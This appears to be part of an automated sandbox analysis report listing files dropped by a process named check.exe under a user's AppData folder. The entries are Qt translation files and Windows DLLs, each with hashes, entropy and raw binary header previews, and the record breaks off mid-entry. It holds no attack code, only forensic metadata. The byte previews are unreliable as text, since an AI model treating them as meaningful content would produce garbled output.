                                                                                                                                                                                                            Preview:<.d....!..`.......jaB../....*...'...+..=....@.......A.......B...?...C...c...D......E......F.......G.......H..."...I...F...P.......Q...'...R...r...S......T......U.......V...8...W...\...X......Y......].."k...s...Q...t..A...............I....;.."C...;..#A...;.......;.......;.......M.."....O...B...O..[?......h....}.."........m...=.......m.."....t...........M..(5......+;......+;..WU..+O......1.......D@......E@...K..H4..>=..HY..F...H...Hr..IC..E...J...F...J.......J...E...LD..Gz..L...G...PS..O...QR......R...K!..T...Z...U...[e..X..._f..Zr..e...[`..7...\...i...]x...'.._......._...j...yg..~+..1.../....E..1?.......#......:.......?.......?n......A....$..G....[..Ap...,..B....y.......y..Ew......|...............E....9..H....E..........F....z...]..............HL...%..=R...D..H.......I!......[......J......M..........5..It...0...3...0.......0...C...0..M....0...a...5..N....5..........N.......L6.. D..#... D..E...+...U%..<U......<U..X ..<...X...H5..#...H5..FK..L...[...VE......VE......V......f.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):156799
                                                                                                                                                                                                            Entropy (8bit):5.859529082176036
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:rvTy18hhPekHs1iNXVExWbStnn8TExgkYOvYejZOvXx4Mmf0MwUL8smk/pDZyy:y18hJ61nMStnn8TOgknQRLWZmkxNyy
                                                                                                                                                                                                            MD5:082E361CBAC2E3A0849F87B76EF6E121
                                                                                                                                                                                                            SHA1:F10E882762DCD2E60041BDD6CC57598FC3DF4343
                                                                                                                                                                                                            SHA-256:0179ED1B136E1CB3F583351EAA2C545BA3D83A6EE3F82C32505926A1A5F5F183
                                                                                                                                                                                                            SHA-512:F378A42116924E30FA0B8FFF1D3C3CB185DC35B2746DCE2818BE7C2AA95C5DE103DF44AAC74DA969C36C557F1D4DE42AC7647EC41066247F8AD2697BDED667EA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......koB..7....*.......+.......@...K...A...o...B......C.......D...8...E.......F...U...G...y...H......I.......P......Q.......R.......S...C...T...g...U.......V.......W.......X...-...Y...Q...]..$....s...>...t...................y...;..${...;..%....;...u...;...l...M..$....O.......O...8...........}..$............=...C...m..%!...t...n..........(5...a..+;..E@..+;..l|..+O......1.......D@.....E@......H4......HY..\...H....]..IC......J.......J....8..J.......LD...a..L.......PS......QR......R...`...T.......U....^..U.......X....y..Zr......[`..y...\....A..]x......_......._....o..yg......1...FJ...E..HE...7..................Q........a.......5...........$..]....[...;...,.......y.......y...V...............!.......|...9..]....E...R...........z...4.......f.......5...%..Te...D..................D......^.............*...5...S...0.......0.......0.......0.......5.......5...........n......a... D..%... D..[...+.......<?......<U...;..<U...+..<.......H5..&...H5..\...L.......VE......V....A..f.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):153608
                                                                                                                                                                                                            Entropy (8bit):4.843805801051326
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:y5pmbKIhooMbGe91MrjOhmGzP6LJbWz5XIxELpU6:yObeqrjPGzeJyJLy6
                                                                                                                                                                                                            MD5:BD8BDC7BBDB7A80C56DCB61B1108961D
                                                                                                                                                                                                            SHA1:9538C4D8BB9A95C0D9DC57C7708A99DD53A32D1F
                                                                                                                                                                                                            SHA-256:846E047573AE40C83671C3BA7F73E27EFC24B98C82701DA0DF9973E574178BB2
                                                                                                                                                                                                            SHA-512:F040EC410EBFEA21145F944E71ADCAE8E5F60907D1D3716A937A9A59A48F70C6B7EAAC91C2C554F59357A7BC820CDBD17C73A4DECC20B51F68EB79EDD35C5554
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......lv_LVB.......*...B...+..y....@.......A...=...B......C......D.......E.......F...#...G...G...H...k...I.......P...~...Q......R.......S.......T...5...U...Y...V......W.......X.......Y.......]..%....s.......t...8.......n.......A...;..&....;.......;...!...;...A...;../....M..%....O.......O...............}..%...........=.......m..&....t...(......(g..(5...+..+;..4...+;..d...+O......1...(...D@...a..E@......H4..z...HY..Q...H.......IC......J....6..J.......J.......LD......L....9..PS......QR......R...U...T....S..U.......X...._..Zr......[`..r...\.......]x...*.._......._....{..yg......1...5v...E..7........(......B.......|.......|W......~r...$..R....[..~....,.......y...l...y...............................9..S....E...g...........z...z...................%..F....D........................"Z.....$......)....5.......0...\...0.......0...r...0.......0.......5...a...5..........J......V... D..&... D..P...+.......<U......<U......<.......H5..'"..H5..P...L....~..VE...R..VE..%...V......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):162982
                                                                                                                                                                                                            Entropy (8bit):4.841899887077422
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:sXpestp/YIFtDT8FIWYbIJmPYuIpnmxAk6mwyJNqSm9+P:sxpTDT8FIWfJmdCmxApmbnqSm9+P
                                                                                                                                                                                                            MD5:F9475A909A0BAF4B6B7A1937D58293C3
                                                                                                                                                                                                            SHA1:76B97225A11DD1F77CAC6EF144812F91BD8734BD
                                                                                                                                                                                                            SHA-256:CE99032A3B0BF8ABAD758895CC22837088EAD99FD2D2514E2D180693081CFE57
                                                                                                                                                                                                            SHA-512:8A4F1B802B6B81FF25C44251FB4A880E93E9A5FE25E36825A24BFE0EFB34E764E7E1EE585D3A56554964B7921E7813C67F12D200D6E0C5EAF4BB76B064B5C890
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......pl_PLB..0....*.."....+.......@...F...A...j...B......C.......D...3...E.......F...P...G...t...H.......I.......P.......Q.......R.......S...>...T...b...U.......V.......W.......X...(...Y...L...]..*....s.......t...r.......o.......+...;..*....;..+....;..."...;... ...M..*....O...6...O...........a...}..+...........=.......m..+G...t...G......,...(5......+;..:...+;..k...+O......1...-[..D@.....E@......H4...U..HY..WU..H.......IC......J....6..J.......J.......LD......L....%..PS......QR.. ...R...[...T....1..U.......X......Zr......[`......\.......]x...A.._......._....}..yg......1...;W...E..=........%......H....................$..Xp...[.......,.......y...i...y...........}......$R...........9..X....E..+)...........z.. E...................%..K....D...p....................&......(......-....5.......0.......0...e...0.......0..+....5...]...5...........f......]-.. D..,%.. D..V?..+....V..<U......<U......<....-..H5..,M..H5..V...L....Z..VE..!...VE..)...V.......f...P...f....K..f......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):203767
                                                                                                                                                                                                            Entropy (8bit):5.362551648909705
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:hn4dEJ63pdhPpy6gu5fs4MHQv6sLlxnrncF423ZL9xyuXwdcX8LZuf76CW+WeXFx:aN3pdV5fZbpItXsttRY+WSq
                                                                                                                                                                                                            MD5:5096AD2743BF89A334FBA6A2964300D4
                                                                                                                                                                                                            SHA1:405F45361A537C7923C240D51B0FF1C46621C203
                                                                                                                                                                                                            SHA-256:3DA6605668F9178D11A838C4515478084DCFB4F9CF22F99D7A92B492DB9C224B
                                                                                                                                                                                                            SHA-512:7B88B501792B5831426BAA669138192ED94CC3F8323A3DF9D5287655DC4D877706908C517AB7523AE8A283BF50B47123F13B8AE40EA2F3081C3459EDC47FC8DD
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......ru_RUB..7....*...L...+...W...@..,....A..,....B..-1...C..-U...D..-....E...r...F.......G.......H../....I../8...P..1'...Q..1K...R..1....S..1....T..1....U..2....V..2\...W..2....X..2....Y..2....].......s..$c...t...'......%........r...;..-....;.......;..J....;..V....M...C...O.......O..&.......8....}...m......+3...=..+....m.......t..+.......p...(5..]@..+;..[0..+;......+O..H...1...qM..D@..-...E@..1o..H4...p..HY..xm..H....*..IC...@..J....g..J.......J.......LD......L....p..PS......QR..!...R...}...T...&...U...'...U...ki..X...+...Zr..3...[`......\...:...]x..)..._......._...;...yg..S...1...\....E..__...7.........H.......k................j.......U...$..y....[.......,.......y...k...y...............................9..y....E...O...........z..!*...................%..nW...D.................%w.....g......j~.....qw...5...H...0.......0..I....0..._...0......5.......5..................~... D../k.. D..wa..+....?..<?.."t..<U......<U.."...<...#z..H5../...H5..w...L...&...VE.."...V...F$.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):125763
                                                                                                                                                                                                            Entropy (8bit):4.80343609423322
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:roXDuC1u/2lUBGjJirE5tsd/aev1GIfOdvhw:OucMGjH5tbm
                                                                                                                                                                                                            MD5:3D60E50DCBCBD70EE699BC9B1524FCB9
                                                                                                                                                                                                            SHA1:0211B4911B5B74CC1A46C0FCA87D3BF5632AA44A
                                                                                                                                                                                                            SHA-256:D586AE2C314074CF398417FDECB40709D5478DFEB0A67C2FE60D509EE9B59ED7
                                                                                                                                                                                                            SHA-512:F98211867F1DBCB8A342C00E23FA5718BE6E999F7449CB8470B41BF0F527C7F78CC4D6666E28968F32E96026907156753979BFADA7E6BF4225D02A902D24906D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......sk_SKB..$x...*.......+..>....@......A......B.......C.......D...3...E...Z...F......G......H.......I.......P.......Q...D...R.......S......T.......U.......V...1...W...X...X.......Y......]...Y...t..D-......K....;...3...;.......;.......;......;...V...M.......O.._ ......l....}.......m...........T..(5...(..+;......+;..%...+O......1......E@...k..F.......H4..?I..HY..@7..H...J...I....,..IC..HT..J...H{..J...H...LD..J"..L...Jv..PS..Q...R...D...Zr..i]..[`..7...\...nB.._...o...1...&....E..(........B......19......A.......A....$..AF...[..C....,..D....y..G.......v........g......G....9..A....E..........IH...%..4.......Kf..............................5..K....0...,...0.......0.......0..Of...0.......5..P....5..........E... D...C.. D..?'..+...Y`..<U......<U..\...<...]...H5...m..H5..?...L...^...VE......f.......f...8...g.......l...aP.......................6......d....D..f(...`..f...............?....`..h5...y..H....5..j........E...e.......e..@....... ......>......oZ......l..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):194487
                                                                                                                                                                                                            Entropy (8bit):4.877239354585035
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:yRRhAFCvqDBitD/iDG9AOH+l4TcwZBPqHo9fd9CFRK+2IKAimxsjucV2p0ZqvRu7:yRRHs5mksWVX3lA3
                                                                                                                                                                                                            MD5:6CBC5D8E1EABEC96C281065ECC51E35E
                                                                                                                                                                                                            SHA1:4E1E6BA3772428227CB033747006B4887E5D9AD1
                                                                                                                                                                                                            SHA-256:6A0BF6E70E7920C2B193E76E92F78F315936955D3B06AC039D917F2E06C43281
                                                                                                                                                                                                            SHA-512:CE1F9EE180176153D5F523D71E0DB06F4DEA65C24E5E2CD56341CFAEE349A8E9A0F606D99F7219A35DD4516D1528C90AEA4BB87548A55392B8F2B36164D478B1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......tr_TRB..7....*.......+...-...@.......A.......B.......C...%...D.......E...F...F.......G.......H.......I.......P.. ....Q.. ....R..!D...S..!h...T..!....U..!....V.."....W.."0...X.."T...Y.."x...]..,g...s.../...t......................;..,9...;..-I...;..9@...;..E....M..,....O.......O...G...........}..,............=...\...m..,....t.........._3..(5..LJ..+;..Wt..+;...\..+O..7...1..._...D@......E@..!...H4...@..HY..t...H....2..IC...r..J......J....D..J....K..LD...$..L....x..PS......QR..!...R...x...T.......U....q..U...Y...X...."..Zr...%..[`......\....:..]x......_......._.......yg..6...1...X....E..[....7...Z......7Q......f............................$..u....[...:...,...5...y.......y...........7...............!...9..u....E...........P...z.. ........p...........%..j....D..................A.....U......Y......_....5...V...0.......0..8....0...U...0.......5.......5..~b..............z+.. D..-... D..s...+.......<?...8..<U...s..<U...p..<.......H5..-...H5..s...L.......VE.."0..V...4..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):158274
                                                                                                                                                                                                            Entropy (8bit):5.402056706327934
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:jXwjFVUDdMUD4TzdAhpQgO5poZHvJllEnhmdK4I77/dnPJX/imfb1jhvv3BxT8ue:jBzD4Tzaw5pCvJ8hVPdlvj3p8
                                                                                                                                                                                                            MD5:D6234E4E21021102B021744D5FA22346
                                                                                                                                                                                                            SHA1:63A14327D0CF0941D6D6B58BFA7E8B10337F557B
                                                                                                                                                                                                            SHA-256:51B8FF55B37DC5907D637A8DDDA12FBE816852B0244C74EB4F0FB84867A786E0
                                                                                                                                                                                                            SHA-512:37D24A092C5F29BACB7A4CA8207C4EEFD0F073B7E74A492402867F758084091BF1D79D2BA2B4A28B35FEF42E8023C371FDE97578F74BB2033551154E77102DE6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......uk_UAB../....*...E...+...l...@.......A.......B...G...C...k...D.......E.......F.......G.......H...*...I...N...P...=...Q...a...R.......S.......T.......U.......V...r...W.......X.......Y.......]..*y...s.......t...........;.......n...;..*Q...;..+U...;.......;...x...;..!(...M..*....O.......O...........6...}..*........E...=.......m..*....t..........3...(5..&...+;..:...+;..k0..+O...A..1...4-..D@... ..E@......H4...8..HY..W...H....2..IC...V..J....}..J.......J....%..LD...&..L....z..PS......QR.. ...R...\...T....(..U.......X.......Zr......[`..~...\.......]x......_......._....4..yg...c..1...;....E..=w.......m......I............................$..X....[...<...,.......y.......y...........M...................9..Y....E...F.......D...z.. ........P...........%..LB...D.......................-n...../......4W...5...F...0...p...0...W...0.......0...k...0.......5.......5..................^... D..+... D..V...+.......<U.../..<U......<....>..H5..+...H5..V...L....S..VE..!...VE..0...V......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):127849
                                                                                                                                                                                                            Entropy (8bit):5.83455389078597
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:Fv2cHP10gOs6dcFxsJopMqOWv2WIrPFP8pa:Fh6s6iFxEodjef8pa
                                                                                                                                                                                                            MD5:9C6A3721D01ECAF3F952CE96F46CE046
                                                                                                                                                                                                            SHA1:4A944E9E31DF778F7012D8E4A66497583BFD2118
                                                                                                                                                                                                            SHA-256:085D29EAF9BBB788B2F2503D74A1EF963A9411CEB600441254CE49A120E1AB63
                                                                                                                                                                                                            SHA-512:6E2807B8785F42A26C9CCBDBA0327DD40B529B10C468593F0E74113774D1CCDAA4FD9ACE9B259B9040E1475911428ECAEA49425B0F170862CF8147D23DB48E46
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......zh_TWB..2x...*.......+..)....@.......A.......B...j...C......D.......E......F.......G...)...H...M...I...q...P...%...Q...I...R......S......T.......U.......V...Z...W...~...X......Y.......]..!....s.......t..-...............4....;..!z...;.."|...;.......;.......M..!....O.......O..Ay......N)...}..!............=.......m.." ...t...(.........(5......+;..;...+;.._...+O......1.......D@...C..E@...m..H4..*W..HY..Pm..H...3...IC..1...J...1...J.......J...1...LD..2...L...38..PS..6...QR...T..R...T...T...A...U...A...X...E...Zr..K...[`..$...\...OW..]x......_......._...P...yg..a^..1...<....E..>....7...>.......;......Fo......+.......+.......-L...$..QR...[..-....,...F...y.......y..1J...............6......1p...9..Q....E..........2....z...........<......3....%..H....D..4W......4}....................Z...... ...5..4....0...?...0...K...0..5....0...L...5..6....5..........6.......U... D.."... D..O...+...<%..<U......<U..>...<...?:..H5..#...H5..O...L...AS..VE...M..VE......V.......f...L..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2483712
                                                                                                                                                                                                            Entropy (8bit):6.241719144701645
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:49152:ZYS8YHrNj4/7RsRLvYpiW3pCBU+Z7bJWvCSBYgbxGJ5M2GM/fXR1fUdihfSbCo6e:9bpj4/7RsRLvYpiW3pCBU+Z7bJWvCSBv
                                                                                                                                                                                                            MD5:678FA1496FFDEA3A530FA146DEDCDBCC
                                                                                                                                                                                                            SHA1:C80D8F1DE8AE06ECF5750C83D879D2DCC2D6A4F8
                                                                                                                                                                                                            SHA-256:D6E45FD8C3B3F93F52C4D1B6F9E3EE220454A73F80F65F3D70504BD55415EA37
                                                                                                                                                                                                            SHA-512:8D9E3FA49FB42F844D8DF241786EA9C0F55E546D373FF07E8C89AAC4F3027C62EC1BD0C9C639AFEABC034CC39E424B21DA55A1609C9F95397A66D5F0D834E88E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........}.........../....td./..../...td./...td./...td./...n../...1../......P...c./....c./....c./...Rich...........................PE..d....p.f.........." ...(.*...........+.......................................0&...........`.............................................L.....................#.$.............%.... t.......................t..(....r..@............@..(o...........................text...~(.......*.................. ..`.rdata..x....@......................@..@.data...h...........................@....pdata..$.....#......n#.............@..@.reloc.......%......L%.............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2494976
                                                                                                                                                                                                            Entropy (8bit):6.232020603277999
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24576:SUjOoTFrwI8nc6EmRAQ9RzgpP2bXYUKuXeLQp5PjYq0zb:SUqCgnZXRAQ9RzggbozJLQp5Mq
                                                                                                                                                                                                            MD5:AE182C36F5839BADDC9DCB71192CFA7A
                                                                                                                                                                                                            SHA1:C9FA448981BA61343C7D7DECACAE300CAD416957
                                                                                                                                                                                                            SHA-256:A9408E3B15FF3030F0E9ACB3429000D253D3BB7206F750091A7130325F6D0D72
                                                                                                                                                                                                            SHA-512:8950244D828C5EDE5C3934CFE2EE229BE19CC00FBF0C4A7CCEBEC19E8641345EF5FD028511C5428E1E21CE5491A3F74FB0175B03DA17588DAEF918E3F66B206A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......... j..sj..sj..sc..sn..s.p.rh..s1..rh..s.p.ri..s.p.rb..s.p.r...s...rh..s..ro..sj..s...syw.ra..syw.rk..syw.rk..sRichj..s........PE..d....p.f.........." ...(.....................................................P&...........`.........................................`&..L....&................$...............%.....................................p...@...............@{...........................text...O........................... ..`.rdata..............................@..@.data...xz.......^...t..............@....pdata........$.......#.............@..@.reloc........%......^%.............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5144576
                                                                                                                                                                                                            Entropy (8bit):6.262739223310643
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:49152:Qi+reIG7QwktsFPKoe2yicbbqgkcY9abW7KnTYK2bjMkTDGM7y:uqT7Q1kyTvoWW7EYvM9M
                                                                                                                                                                                                            MD5:E8C3BFBC19378E541F5F569E2023B7AA
                                                                                                                                                                                                            SHA1:ACA007030C1CEE45CBC692ADCB8BCB29665792BA
                                                                                                                                                                                                            SHA-256:A1E97A2AB434C6AE5E56491C60172E59CDCCE42960734E8BDF5D851B79361071
                                                                                                                                                                                                            SHA-512:9134C2EAD00C2D19DEC499E60F91E978858766744965EAD655D2349FF92834AB267AC8026038E576A7E207D3BBD4A87CD5F2E2846A703C7F481A406130530EB0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................=....1M............1M.....1M.....1M.....+......t.............J......J......J.....Rich...........................PE..d....p.f.........." ...(..,...!.....P.,.......................................N...........`..........................................><.T...D?<...............H..z...........pM..O..Pa8..............................`8.@.............,..............................text.....,.......,................. ..`.rdata........,.......,.............@..@.data... :....A.......A.............@....pdata...z....H..|....H.............@..@.reloc...O...pM..P...0M.............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):120320
                                                                                                                                                                                                            Entropy (8bit):6.034057886020456
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:pPd5NTdYgpmMrZhekwFH4PqgZNBQmT6V6WRFYE9Icx7pz4H5B:NhTdtmMdEkwuFTSvYE9Iczz4H5
                                                                                                                                                                                                            MD5:4F7F9E3A9466F4C0103FB04E1987E098
                                                                                                                                                                                                            SHA1:D4A339702E936AA5ECC1FE906AE2BA3BB0E481D7
                                                                                                                                                                                                            SHA-256:EBF27146466D61411493D2E243EAC691740F9C4B7A4B9AB0D408BE45B5E0AA35
                                                                                                                                                                                                            SHA-512:920BA8D58DCA7946341C1CC01FEA0B76CCE008F1D10061F84455A3DE9BA00FD9534F40C983486211BE92B85F786CD610C386529711A6F573A02BFAF8CA543A19
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........kSR...R...R...[...Z....X..P.......P....X..Q....X..Z....X.._....^..Q...R.......G_..[...G_..S...G_..S...G_..S...RichR...........PE..d.... g.........." ...(.H...........J.......................................0............`.............................................X...h................................ ..........................................@............`...............................text...(G.......H.................. ..`.rdata..lU...`...V...L..............@..@.data.... ..........................@....pdata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):120400
                                                                                                                                                                                                            Entropy (8bit):6.6017475353076716
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:N9TXF5LLXQLlNycKW+D4SdqJk6aN1ACuyxLiyazYaCVoecbdhgOwAd+zfZ1zu:N9jelDoD9uyxLizzFzecbdPwA87S
                                                                                                                                                                                                            MD5:862F820C3251E4CA6FC0AC00E4092239
                                                                                                                                                                                                            SHA1:EF96D84B253041B090C243594F90938E9A487A9A
                                                                                                                                                                                                            SHA-256:36585912E5EAF83BA9FEA0631534F690CCDC2D7BA91537166FE53E56C221E153
                                                                                                                                                                                                            SHA-512:2F8A0F11BCCC3A8CB99637DEEDA0158240DF0885A230F38BB7F21257C659F05646C6B61E993F87E0877F6BA06B347DDD1FC45D5C44BC4E309EF75ED882B82E4E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\=..\...\...\..S$...\...$...\...\..5\...\...\.....\.....\.....\.....\......\.....\..Rich.\..........PE..d.....x.........." ...).$...d............................................................`A........................................0u..4...d}..........................PP...........^..p............................\..@............@...............................text............................... ..`fothk........0...................... ..`.rdata...C...@...D...(..............@..@.data................l..............@....pdata...............p..............@..@_RDATA...............|..............@..@.rsrc................~..............@..@.reloc..............................@..B................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):49744
                                                                                                                                                                                                            Entropy (8bit):6.701724666218339
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:ApzzO6ujT3MbR3v0Cz6SR8q83yaFdWr9zRcmgEl6U9zSC:9q/oGw3fFdwzRcmZFzSC
                                                                                                                                                                                                            MD5:68156F41AE9A04D89BB6625A5CD222D4
                                                                                                                                                                                                            SHA1:3BE29D5C53808186EBA3A024BE377EE6F267C983
                                                                                                                                                                                                            SHA-256:82A2F9AE1E6146AE3CB0F4BC5A62B7227E0384209D9B1AEF86BBCC105912F7CD
                                                                                                                                                                                                            SHA-512:F7BF8AD7CD8B450050310952C56F6A20B378A972C822CCC253EF3D7381B56FFB3CA6CE3323BEA9872674ED1C02017F78AB31E9EB9927FC6B3CBA957C247E5D57
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?.{...{...{...0...y.......y...r.H.p...{...H.......|.......`.......~.......z.....$.z.......z...Rich{...........PE..d...l0.?.........." ...).<...8.......@...............................................b....`A........................................pm.......m..x....................r..PP......D....c..p...........................`b..@............P..`............................text....;.......<.................. ..`.rdata.."#...P...$...@..............@..@.data................d..............@....pdata...............f..............@..@.rsrc................l..............@..@.reloc..D............p..............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):84240
                                                                                                                                                                                                            Entropy (8bit):6.607563436050078
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:Kdrz7l1EVLsSuvX3dUK4MLgqK7YEog8y5sV8lIJLVy7SyFB:urzcuvXvrEo7y6V8lIJLVyB
                                                                                                                                                                                                            MD5:CB8C06C8FA9E61E4AC5F22EEBF7F1D00
                                                                                                                                                                                                            SHA1:D8E0DFC8127749947B09F17C8848166BAC659F0D
                                                                                                                                                                                                            SHA-256:FC3B481684B926350057E263622A2A5335B149A0498A8D65C4F37E39DD90B640
                                                                                                                                                                                                            SHA-512:E6DA642B7200BFB78F939F7D8148581259BAA9A5EDDA282C621D14BA88083A9B9BD3D17B701E9CDE77AD1133C39BD93FC9D955BB620546BB4FCF45C68F1EC7D6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e...!m..!m..!m..(.o.+m..1...#m..1..."m..1...%m..1...)m..1...,m..i..."m..j...#m..!m..|m..i...)m..i... m..i... m..i... m..Rich!m..........PE..d.....g.........." ...).....\......0........................................P......7[....`.............................................H...(........0....... .. ......../...@..........T...........................`...@...............x............................text............................... ..`.rdata...=.......>..................@..@.data...............................@....pdata.. .... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):131344
                                                                                                                                                                                                            Entropy (8bit):6.311142284249784
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:3RF024DWkT/DKGkXY402iXnVJf/FO50XnekZ39gPhvEQZIJyPArm:j0nHT/DKFXZorf/FO50uW3SEQt
                                                                                                                                                                                                            MD5:A55E57D7594303C89B5F7A1D1D6F2B67
                                                                                                                                                                                                            SHA1:904A9304A07716497CF3E4EAAFD82715874C94F1
                                                                                                                                                                                                            SHA-256:F63C6C7E71C342084D8F1A108786CA6975A52CEFEF8BE32CC2589E6E2FE060C8
